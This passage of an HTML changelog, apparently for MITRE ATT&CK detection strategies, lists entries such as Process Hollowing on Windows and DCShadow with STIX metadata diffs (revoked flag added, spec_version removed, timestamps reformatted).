collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0533] Detection Strategy for Poisoned Pipeline Execution via SaaS CI/CD Workflows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0324] Detection Strategy for Polymorphic Code Mutation and Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0417] Detection Strategy for Power Settings Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0451] Detection Strategy for PowerShell Profile Persistence via profile.ps1 Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0045] Detection Strategy for Process Argument Spoofing on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0544] Detection Strategy for Process Doppelgänging on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0382] Detection Strategy for Process Hollowing on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0538] Detection Strategy for Protocol Tunneling accross OS platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0203] Detection Strategy for Ptrace-Based Process Injection on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0408] Detection Strategy for Reflection Amplification DoS (T1498.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0300] Detection Strategy for Reflective Code Loading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0574] Detection Strategy for Remote System Enumeration Behavior</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0584] Detection Strategy for Resource Forking on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0156] Detection Strategy for Resource Hijacking: SMS Pumping via SaaS Application Logs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0276] Detection Strategy for Rogue Domain Controller (DCShadow) Registration and Replication Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0277] Detection Strategy for Role Addition to Cloud Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px 